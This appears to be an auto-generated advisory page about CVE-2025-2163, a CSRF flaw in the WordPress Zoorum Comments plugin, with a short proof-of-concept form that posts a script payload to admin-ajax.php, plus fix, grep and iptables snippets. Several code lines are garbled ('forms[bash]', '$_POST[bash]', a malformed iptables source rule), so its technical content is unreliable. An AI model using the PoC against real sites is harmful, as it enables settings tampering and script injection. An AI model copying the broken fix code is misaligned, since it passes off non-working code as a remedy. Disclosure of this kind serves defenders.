WordPress, Cross-Site Request Forgery, CVE-2025-2163 (Medium)

The Zoorum Comments plugin (≤ v0.9) fails to validate nonces in the `zoorum_set_options()` function, allowing attackers to forge requests. When an admin clicks a malicious link, attacker-controlled payloads execute without consent, modifying settings or injecting scripts due to missing CSRF protections.

DailyCVE Form

Platform: WordPress
Version: ≤0.9
Vulnerability: CSRF
Severity: Medium
Date: 03/28/2025

What Undercode Say:

Exploit:

<!-- Malicious CSRF PoC -->

<form action="http://target/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="zoorum_set_options">
<input type="hidden" name="payload" value="<script>alert(1)</script>">
</form>

<script>document.forms[bash].submit();</script>

Protection:

1. Patch via plugin update.

2. Add nonce checks:

function zoorum_set_options() {
if (!wp_verify_nonce($_POST[bash], 'zoorum_nonce')) {
wp_die('Invalid nonce');
}
// Rest of logic
}

Analytics:

  • CVSS: 6.5 (Medium)
  • Attack Vector: Network
  • Privileges Required: None
  • User Interaction: Required

Detection:

Grep for vulnerable function
grep -r "function zoorum_set_options" /var/www/html/

Mitigation Commands:

Temporary fix: Restrict admin access
iptables -A INPUT -p tcp --dport 80 -s !TRUSTED_IP -j DROP

References:

References:

Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-2163
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top